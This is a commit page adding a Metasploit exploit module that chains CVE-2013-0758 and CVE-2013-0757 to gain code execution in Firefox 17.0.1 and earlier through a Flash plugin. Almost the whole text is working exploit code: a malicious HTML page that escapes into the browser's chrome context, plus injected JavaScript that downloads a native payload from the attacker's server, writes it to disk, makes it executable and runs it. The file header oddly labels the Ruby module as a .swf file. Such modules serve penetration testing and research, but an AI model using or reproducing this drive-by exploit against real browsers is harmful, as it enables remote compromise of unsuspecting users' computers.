Landing rapid7#1856 - CVE-2013-0758 Firefox <= 17.0.1 + Flash RCE

Chained exploit using CVE-2013-0758 and CVE-2013-0757

Author: wchen-r7

data/exploits/cve-2013-0758.swf

@@ -0,0 +1,294 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+	include Msf::Exploit::EXE
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Firefox 17.0.1 + Flash Privileged Code Injection',
+			'Description'    => %q{
+				This exploit gains remote code execution on Firefox 17.0.1 and all previous
+				versions, provided the user has installed Flash. No memory corruption is used.
+
+				First, a Flash object is cloned into the anonymous content of the SVG
+				"use" element in the <body> (CVE-2013-0758). From there, the Flash object
+				can navigate a child frame to a URL in the chrome:// scheme.
+
+				Then a separate exploit (CVE-2013-0757) is used to bypass the security wrapper
+				around the child frame's window reference and inject code into the chrome://
+				context. Once we have injection into the chrome execution context, we can write
+				the payload to disk, chmod it (if posix), and then execute.
+
+				Note: Flash is used here to trigger the exploit but any Firefox plugin
+				with script access should be able to trigger it.
+			},
+			'License'        => MSF_LICENSE,
+			'Targets'        =>
+				[
+					[ 'Automatic',
+						{
+							'Platform' => ['win', 'linux', 'osx'],
+							'Arch'     => ARCH_X86
+						}
+					],
+					[ 'Windows x86 (Native Payload)',
+						{
+							'Platform' => 'win',
+							'Arch' => ARCH_X86
+						}
+					],
+					[ 'Linux x86 (Native Payload)',
+						{
+							'Platform' => 'linux',
+							'Arch' => ARCH_X86
+						}
+					],
+					[ 'Mac OS X x86 (Native Payload)',
+						{
+							'Platform' => 'osx',
+							'Arch' => ARCH_X86,
+						}
+					]
+				],
+			'DefaultTarget'  => 0,
+			'Author'         =>
+				[
+					'Marius Mlynski', # discovery & bug report
+					'joev',           # metasploit module
+					'sinn3r'          # metasploit fu
+				],
+			'References'     =>
+				[
+					['CVE', '2013-0758'],  # navigate a frame to a chrome:// URL
+					['CVE', '2013-0757'],  # bypass Chrome Object Wrapper to talk to chrome://
+					['URL', 'http://www.mozilla.org/security/announce/2013/mfsa2013-15.html'],
+					['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=813906']
+				],
+			'DisclosureDate' => 'Jan 08 2013'
+		))
+
+		register_options(
+			[
+				OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", '' ] ),
+				OptBool.new('DEBUG', [false, "Display some alert()'s for debugging the payload.", false])
+			], Auxiliary::Timed)
+
+	end
+
+	def on_request_uri(cli, request)
+		my_target = get_target(request.headers['User-Agent'])
+		if my_target.nil?
+			print_error("User agent does not match an available payload type, bailing.")
+			send_not_found(cli)
+			return
+		end
+
+		target = my_target
+
+		if request.uri =~ /\.swf$/
+			# send Flash .swf for navigating the frame to chrome://
+			print_status("Sending .swf trigger.")
+			send_response(cli, flash_trigger, { 'Content-Type' => 'application/x-shockwave-flash' })
+		elsif request.uri =~ /\.bin/
+			# send the binary payload to drop & exec
+			print_status("Child frame navigated. Sending binary payload to drop & execute.")
+			send_response(cli, dropped_file_contents(cli, target), { 'Content-Type' => 'application/octet-stream' })
+		else
+			# send initial HTML page
+			print_status("Target selected: #{target.name}")
+			print_status("Sending #{self.name}")
+			send_response_html(cli, generate_html(target))
+		end
+		handler(cli)
+	end
+
+	# @return [String] the encoded executable for dropping onto the client's machine
+	def dropped_file_contents(cli, target)
+		return if ((p=regenerate_payload(cli)) == nil)
+		opts = target.opts
+		exe = ''
+
+		case target.name
+		when /windows/i
+			opts = opts.merge({:code=>p.encoded})
+			exe = generate_payload_exe(opts)
+		when /linux/i
+			exe = Msf::Util::EXE.to_linux_x86_elf(framework, p.encoded, opts)
+		when /os x/i
+			exe = Msf::Util::EXE.to_osx_x86_macho(framework, p.encoded, opts)
+		end
+
+		return exe
+	end
+
+	# @return [Msf::Module::Target] that matches the client's user-agent header
+	def get_target(agent)
+		# Not firefox, bail
+		if agent !~ /firefox/i
+			return nil
+		end
+
+		# User wants to manually specify a target, respect that
+		if target != targets[0]
+			return target
+		end
+
+		# os detection
+		if agent =~ /windows/i
+			targets[1]
+		elsif agent =~ /linux/i
+			targets[2]
+		elsif agent =~ /macintosh/i and agent =~ /intel/i
+			targets[3]
+		else
+			nil
+		end
+	end
+
+	# @return [String] the contents of the .swf file used to trigger the exploit
+	def flash_trigger
+		swf_path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0758.swf")
+		@flash_trigger ||= File.read(swf_path)
+	end
+
+	# @return [String] the filename that will be used when the payload is dropped
+	def payload_filename(target)
+		if target.name =~ /Windows x86/i
+			"#{Rex::Text.rand_text_alphanumeric(8)}.exe"
+		else
+			"#{Rex::Text.rand_text_alphanumeric(8)}.bin"
+		end
+	end
+
+	# @return [String] containing javascript code to execute with chrome privileges
+	def js_payload(target)
+		%Q|
+		#{js_debug("Injection successful. JS executing with chrome privileges.")}
+		var x = new XMLHttpRequest;
+		x.overrideMimeType('text/plain; charset=x-user-defined');
+		x.open('POST', '#{base_url}.bin', false);
+		x.send(null);
+		#{js_debug("'Payload: '+x.responseText", "")}
+		var file = Components.classes["@mozilla.org/file/directory_service;1"]
+		  .getService(Components.interfaces.nsIProperties)
+		  .get("TmpD", Components.interfaces.nsIFile);
+		file.append('#{payload_filename(target)}');
+		var stream = Components.classes["@mozilla.org/network/safe-file-output-stream;1"]
+		  .createInstance(Components.interfaces.nsIFileOutputStream);
+		stream.init(file, 0x04 \| 0x08 \| 0x20, 0666, 0);
+		stream.write(x.responseText, x.responseText.length);
+		if (stream instanceof Components.interfaces.nsISafeOutputStream) {
+			stream.finish();
+		} else {
+			stream.close();
+		}
+		#{chmod_code(target)}
+		#{js_debug("'Downloaded to: '+file.path", "")}
+		var process = Components.classes["@mozilla.org/process/util;1"]
+		                .createInstance(Components.interfaces.nsIProcess);
+		process.init(file);
+		process.run(false, [], 0);
+		|
+	end
+
+	# @return [String] containing javascript that will alert a debug string
+	#   if the DEBUG is set to true
+	def js_debug(str, quote="'")
+		if datastore['DEBUG'] then "alert(#{quote}#{str}#{quote})" else '' end
+	end
+
+	# @return [String] containing javascript that will chmod the dropped executable
+	def chmod_code(target)
+		return '' if target.name == 'Windows x86 (Native Payload)'
+		%Q|
+			var chmod=Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile);
+			chmod.initWithPath("/bin/chmod");
+			var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess);
+			process.init(chmod);
+			process.run(true, ["+x", file.path], 2);
+		|
+	end
+
+	# @return [String] URL for sending requests back to the module
+	def base_url
+		proto = (datastore["SSL"] ? "https" : "http")
+		myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+		"#{proto}://#{myhost}:#{datastore['SRVPORT']}#{get_resource}"
+	end
+
+	# @return [String] HTML that is sent in the first response to the client
+	def generate_html(target)
+		vars = {
+			:symbol_id        => 'a',
+			:random_domain    => 'safe',
+			:payload          => js_payload(target),
+			:payload_var      => 'c',
+			:payload_key      => 'k',
+			:payload_obj_var  => 'payload_obj',
+			:interval_var     => 'itvl',
+			:access_string    => 'access',
+			:frame_ref        => 'frames[0]',
+			:frame_name       => 'n',
+			:loader_path      => "#{base_url}.swf",
+			:content          => self.datastore['CONTENT'] || ''
+		}
+		%Q|
+			<!doctype html>
+			<html>
+			<head>
+				<base href="chrome://browser/content/">
+			</head>
+			<body>
+
+			<svg style='position: absolute;top:-500px;left:-500px;width:1px;height:1px'>
+				<symbol id="#{vars[:symbol_id]}">
+					<foreignObject>
+						<object></object>
+					</foreignObject>
+				</symbol>
+				<use />
+			</svg>
+
+			<script>
+			var #{vars[:payload_obj_var]} = #{JSON.unparse({vars[:payload_key] => vars[:payload]})};
+			var #{vars[:payload_var]} = #{vars[:payload_obj_var]}['#{vars[:payload_key]}'];
+			function $() {
+				document.querySelector('base').href = "http://www.#{vars[:random_domain]}.com/";
+			}
+			function _() {
+				return '#{vars[:frame_name]}';
+			}
+			var #{vars[:interval_var]} = setInterval(function(){
+				try{ #{vars[:frame_ref]}['#{vars[:access_string]}'] }
+				catch(e){
+					clearInterval(#{vars[:interval_var]});
+					var p = Object.getPrototypeOf(#{vars[:frame_ref]});
+					var o = {__exposedProps__: {setTimeout: "rw", call: "rw"}};
+					Object.prototype.__lookupSetter__("__proto__").call(p, o);
+					p.setTimeout.call(#{vars[:frame_ref]}, #{vars[:payload_var]}, 1);
+				}
+			}, 100);
+			document.querySelector('object').data = "#{vars[:loader_path]}";
+			document.querySelector('use').setAttributeNS(
+				"http://www.w3.org/1999/xlink", "href", location.href + "##{vars[:symbol_id]}"
+			);
+			</script>
+
+			<iframe style="position:absolute;top:-500px;left:-500px;width:1px;height:1px"
+			        name="#{vars[:frame_name]}"></iframe>
+			#{vars[:content]}
+			</body>
+			</html>
+			|
+	end
+end